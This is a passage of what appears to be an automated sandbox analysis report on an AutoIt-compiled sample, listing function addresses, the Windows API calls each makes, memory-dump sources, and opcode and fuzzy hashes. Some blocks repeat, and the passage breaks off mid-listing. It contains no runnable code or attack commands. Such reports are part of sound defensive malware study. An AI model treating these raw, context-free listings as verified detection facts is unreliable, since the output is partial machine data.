                            • GetSysColorBrush.USER32 ref: 003C3074
                            • RegisterClassExW.USER32(00000030), ref: 003C309E
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C30AF
                            • InitCommonControlsEx.COMCTL32(?), ref: 003C30CC
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                            • LoadIconW.USER32 ref: 003C30F2
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 2914291525-1005189915
                            • Opcode ID: 774f1ab47b95bda00127914ee85ba331db9ce9eb5b9a6556400fdb51b276013b
                            • Instruction ID: 37abb24cf7e7d8a26364838c6c3e773070d19e10d16a1a6a6e3803968846c4dd
                            • Opcode Fuzzy Hash: 774f1ab47b95bda00127914ee85ba331db9ce9eb5b9a6556400fdb51b276013b
                            • Instruction Fuzzy Hash: C33167B5800349EFDB00DFA4D888A9EBFF0FB0A310F14496EE480E62A0D3B90555CF99
                            Function 00424F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • timeGetTime.WINMM ref: 00424F7A
                              • Part of subcall function 003E049F: timeGetTime.WINMM ref: 003E04A3
                            • Sleep.KERNEL32(0000000A), ref: 00424FA6
                            • EnumThreadWindows.USER32 ref: 00424FCA
                            • FindWindowExW.USER32 ref: 00424FEC
                            • SetActiveWindow.USER32 ref: 0042500B
                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00425019
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00425038
                            • Sleep.KERNEL32(000000FA), ref: 00425043
                            • IsWindow.USER32 ref: 0042504F
                            • EndDialog.USER32 ref: 00425060
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                            • String ID: BUTTON
                            • API String ID: 1194449130-3405671355
                            • Opcode ID: 5d7bb6f27661245b8bb2a5b82b5f2c6e4819374a8c88dfe23ebdd718094dc1c3
                            • Instruction ID: 30ebde697a55a697ed4afedbc875b812d25e4212df3601b48ebf1a1961c3db4f
                            • Opcode Fuzzy Hash: 5d7bb6f27661245b8bb2a5b82b5f2c6e4819374a8c88dfe23ebdd718094dc1c3
                            • Instruction Fuzzy Hash: F221CF74300601FFE7105F60FD88B2A3B69EB86349B46143DF105922B1CB798D048B6E
                            Function 003C3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColorBrush.USER32 ref: 003C3074
                            • RegisterClassExW.USER32(00000030), ref: 003C309E
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C30AF
                            • InitCommonControlsEx.COMCTL32(?), ref: 003C30CC
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C30DC
                            • LoadIconW.USER32 ref: 003C30F2
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C3101
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 2914291525-1005189915
                            • Opcode ID: fac23773d91bd8a736ead6b0870665472671346a3fdd809085d6171fc893bce2
                            • Instruction ID: 3fbca67485123dabe42bbc105c36fb6ae3712294441b1bf69c70837a54737e2e
                            • Opcode Fuzzy Hash: fac23773d91bd8a736ead6b0870665472671346a3fdd809085d6171fc893bce2
                            • Instruction Fuzzy Hash: 7621F7B9D50608AFDB00EFA4EC48B9DBBF4FB09700F00453AF510A62A0D7B54558CFA9
                            Function 0042D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • CoInitialize.OLE32(00000000), ref: 0042D5EA
                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0042D67D
                            • SHGetDesktopFolder.SHELL32(?), ref: 0042D691
                            • CoCreateInstance.OLE32(00452D7C,00000000,00000001,00478C1C,?), ref: 0042D6DD
                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0042D74C
                            • CoTaskMemFree.OLE32(?), ref: 0042D7A4
                            • _memset.LIBCMT ref: 0042D7E1
                            • SHBrowseForFolderW.SHELL32(?), ref: 0042D81D
                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0042D840
                            • CoTaskMemFree.OLE32(00000000), ref: 0042D847
                            • CoTaskMemFree.OLE32(00000000), ref: 0042D87E
                            • CoUninitialize.OLE32 ref: 0042D880
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                            • String ID:
                            • API String ID: 1246142700-0
                            • Opcode ID: e8f3eff171414af168573af6188cbd038d4bacd4f081f83c8d3631d33b6dcff6
                            • Instruction ID: 8526ebe750a63a9b67f34449e96e40fa56ea53ff10ee592509823ba53fe1220e
                            • Opcode Fuzzy Hash: e8f3eff171414af168573af6188cbd038d4bacd4f081f83c8d3631d33b6dcff6
                            • Instruction Fuzzy Hash: 1FB12C75A00119AFDB04DFA4D888EAEBBB9FF49304F1084A9F809DB261DB34ED45CB54
                            Function 0041C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,00000001), ref: 0041C283
                            • GetWindowRect.USER32(00000000,?), ref: 0041C295
                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0041C2F3
                            • GetDlgItem.USER32(?,00000002), ref: 0041C2FE
                            • GetWindowRect.USER32(00000000,?), ref: 0041C310
                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0041C364
                            • GetDlgItem.USER32(?,000003E9), ref: 0041C372
                            • GetWindowRect.USER32(00000000,?), ref: 0041C383
                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0041C3C6
                            • GetDlgItem.USER32(?,000003EA), ref: 0041C3D4
                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0041C3F1
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0041C3FE
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$ItemMoveRect$Invalidate
                            • String ID:
                            • API String ID: 3096461208-0
                            • Opcode ID: 3686b54322154d88809481cf6bb44ecccf7c1bf6d8dae19e3d032671c4bdb721
                            • Instruction ID: 3dfde6285c6ad5b736917667f93b2e87b8aaf301009e3f97530330f8395d7e7d
                            • Opcode Fuzzy Hash: 3686b54322154d88809481cf6bb44ecccf7c1bf6d8dae19e3d032671c4bdb721
                            • Instruction Fuzzy Hash: 8C518075B00209AFDB08CFA9DD89AAEBBBAEB88311F14813DF915D7290D7709D448B14
                            Function 0042A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                            Download Yara Rule
                            APIs
                            • CharLowerBuffW.USER32(?,?), ref: 0042A90B
                            • GetDriveTypeW.KERNEL32(00000061,004789A0,00000061), ref: 0042A9D5
                            • _wcscpy.LIBCMT ref: 0042A9FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: BuffCharDriveLowerType_wcscpy
                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                            • API String ID: 2820617543-1000479233
                            • Opcode ID: 37c62ed625f86330cbfbf38ba7fa77519f76feaadf5b0708e7a14f153a6d6ee5
                            • Instruction ID: 9f3b040ec74ea10d09602fccda57f1ec144fa150b9aa9c6209b7919311065230
                            • Opcode Fuzzy Hash: 37c62ed625f86330cbfbf38ba7fa77519f76feaadf5b0708e7a14f153a6d6ee5
                            • Instruction Fuzzy Hash: 6851D0712083119BC305EF15D892BAFB7A5EF84300F514C2EF9859B2A2DB359D49CB47
                            Function 00448645 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                            Download Yara Rule
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004486FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID: `$
                            • API String ID: 634782764-74666722
                            • Opcode ID: e41b14b569a3d8e36267ee437a5da6c40c22abac8ec1d5c4fcab1eb0ff87371f
                            • Instruction ID: 5c5177da20b9330dcdcec13b2bf077f2f7cba36040032e3ffa9e26fb04e21f61
                            • Opcode Fuzzy Hash: e41b14b569a3d8e36267ee437a5da6c40c22abac8ec1d5c4fcab1eb0ff87371f
                            • Instruction Fuzzy Hash: DE51C530500204BEFF20AB24CC85FAE7BA4FB05714F60452FF914E62A1CF79A980CB59
                            Function 003C9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __i64tow__itow__swprintf
                            • String ID: %.15g$0x%p$False$True
                            • API String ID: 421087845-2263619337
                            • Opcode ID: cf1f5ece81422bf5f32158a236ffb0fb871b7992b5f7f8b5ec7509cd02c35fd0
                            • Instruction ID: a9373d3a6acf68f4c9a14b939b6c5147a9410e935d8ed9e174780e57e182fa85
                            • Opcode Fuzzy Hash: cf1f5ece81422bf5f32158a236ffb0fb871b7992b5f7f8b5ec7509cd02c35fd0
                            • Instruction Fuzzy Hash: 1341E371500309AEEB26DF35DC4AF7A73E8EF06300F2145AFEA49DB291EA719D418B10
                            Function 004474BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                            Download Yara Rule
                            APIs
                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 0044755E
                            • CreateCompatibleDC.GDI32(00000000), ref: 00447565
                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00447578
                            • SelectObject.GDI32(00000000,00000000), ref: 00447580
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044758B
                            • DeleteDC.GDI32(00000000), ref: 00447594
                            • GetWindowLongW.USER32(?,000000EC), ref: 0044759E
                            • SetLayeredWindowAttributes.USER32 ref: 004475B2
                            • DestroyWindow.USER32 ref: 004475BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                            • String ID: static
                            • API String ID: 2559357485-2160076837
                            • Opcode ID: 5373936b7c7d17192c3b9f26019a36b7fde4fcbdeeb9b5e7d473c78f710ba8ff
                            • Instruction ID: 625ad72cdbc7e6e93cbeaf3e2ce07f8ddea45535b9a2cca1f408c8412553ce7c
                            • Opcode Fuzzy Hash: 5373936b7c7d17192c3b9f26019a36b7fde4fcbdeeb9b5e7d473c78f710ba8ff
                            • Instruction Fuzzy Hash: 07316D76105214BFEF119F64DC08FEB3BA9FF0A365F110225FA15A61A0C735D816DBA8
                            Function 003E6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 003E6E3E
                              • Part of subcall function 003E8B28: __getptd_noexit.LIBCMT ref: 003E8B28
                            • __gmtime64_s.LIBCMT ref: 003E6ED7
                            • __gmtime64_s.LIBCMT ref: 003E6F0D
                            • __gmtime64_s.LIBCMT ref: 003E6F2A
                            • __allrem.LIBCMT ref: 003E6F80
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E6F9C
                            • __allrem.LIBCMT ref: 003E6FB3
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E6FD1
                            • __allrem.LIBCMT ref: 003E6FE8
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E7006
                            • __invoke_watson.LIBCMT ref: 003E7077
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                            • String ID:
                            • API String ID: 384356119-0
                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                            • Instruction ID: 11bede632f339849d0769d2b70b874c2d0e60c21a47fffd06aea655d0256fdba
                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                            • Instruction Fuzzy Hash: F471F876A00767ABD716AF6ADC42B6AB3A8AF54360F144329F514EB2C1E770DD0087D0
                            Function 00422527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00422542
                            • GetMenuItemInfoW.USER32 ref: 004225A3
                            • SetMenuItemInfoW.USER32 ref: 004225D9
                            • Sleep.KERNEL32(000001F4), ref: 004225EB
                            • GetMenuItemCount.USER32(?), ref: 0042262F
                            • GetMenuItemID.USER32(?,00000000), ref: 0042264B
                            • GetMenuItemID.USER32(?,-00000001), ref: 00422675
                            • GetMenuItemID.USER32(?,?), ref: 004226BA
                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00422700
                            • GetMenuItemInfoW.USER32 ref: 00422714
                            • SetMenuItemInfoW.USER32 ref: 00422735
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                            • String ID:
                            • API String ID: 4176008265-0
                            • Opcode ID: 98017e26426f3a547593c60fa16b27bfa0b3da8e9a4895dd264cc89ae228b965
                            • Instruction ID: 82cf900b624f34d015e175119abdf646e7d4f1a13f9f62205928f48a1a909d7d
                            • Opcode Fuzzy Hash: 98017e26426f3a547593c60fa16b27bfa0b3da8e9a4895dd264cc89ae228b965
                            • Instruction Fuzzy Hash: EE61E270A00269BFDB11CF64EE84DBF7BB8EB41304F94446AF801A7251D7B9AD05DB29
                            Function 00416B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00416BBF
                            • SafeArrayAllocData.OLEAUT32(?), ref: 00416C18
                            • VariantInit.OLEAUT32(?), ref: 00416C2A
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00416C4A
                            • VariantCopy.OLEAUT32(?,?), ref: 00416C9D
                            • SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00416950), ref: 00416CB1
                            • VariantClear.OLEAUT32(?), ref: 00416CC6
                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00416CD3
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00416CDC
                            • VariantClear.OLEAUT32(?), ref: 00416CEE
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00416CF9
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            • Opcode ID: 252fa964f65bdf1a97cbde98e4b578309e01e99c88b3ae60be6af99abd5b1ee8
                            • Instruction ID: e9e364fa9836618f264fcbc1643bdc67f2bbea7d9721984c463144bde2c6ed9b
                            • Opcode Fuzzy Hash: 252fa964f65bdf1a97cbde98e4b578309e01e99c88b3ae60be6af99abd5b1ee8
                            • Instruction Fuzzy Hash: 2C416035A002199FCF00DFA8D848DEEBBB9EF18354F01807AE955E7261DB34E945CB94
                            Function 0044D43E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • GetSystemMetrics.USER32(0000000F), ref: 0044D47C
                            • GetSystemMetrics.USER32(0000000F), ref: 0044D49C
                            • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 0044D6D7
                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0044D6F5
                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0044D716
                            • ShowWindow.USER32(00000003,00000000), ref: 0044D735
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0044D75A
                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0044D77D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                            • String ID: `$
                            • API String ID: 1211466189-74666722
                            • Opcode ID: 07c6ceb97d817a4d5a91ffa5d126a4b8adb23487400edd63f1f355f06c4f9a18
                            • Instruction ID: 0ee87394875bd5ff911eb10d1b3a9fd747b6ed6e398ca728f8b196751a237f0b
                            • Opcode Fuzzy Hash: 07c6ceb97d817a4d5a91ffa5d126a4b8adb23487400edd63f1f355f06c4f9a18
                            • Instruction Fuzzy Hash: EBB18B75A00625EFEF14CF68C9857AE7BB1BF04711F09807AEC489B295DB38A950CB58
                            Function 004383BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • CoInitialize.OLE32 ref: 00438403
                            • CoUninitialize.OLE32 ref: 0043840E
                            • CoCreateInstance.OLE32(?,00000000,00000017,00452BEC,?), ref: 0043846E
                            • IIDFromString.OLE32(?,?), ref: 004384E1
                            • VariantInit.OLEAUT32(?), ref: 0043857B
                            • VariantClear.OLEAUT32(?), ref: 004385DC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            • API String ID: 834269672-1287834457
                            • Opcode ID: 217f2870382339b63c88a661e563f98535f5eb2336e2d221e259c763084d9074
                            • Instruction ID: 2b7ffcd27b7af36dfda13754124216488cdf585c02b45407e41d5c49b848b083
                            • Opcode Fuzzy Hash: 217f2870382339b63c88a661e563f98535f5eb2336e2d221e259c763084d9074
                            • Instruction Fuzzy Hash: 4F61AA70608312AFC711DF24C848F6AF7E8AF59714F10481EF9859B291DB78ED48CB9A
                            Function 00435732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 00435793
                            • inet_addr.WSOCK32(?,?,?), ref: 004357D8
                            • gethostbyname.WSOCK32(?), ref: 004357E4
                            • IcmpCreateFile.IPHLPAPI ref: 004357F2
                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00435862
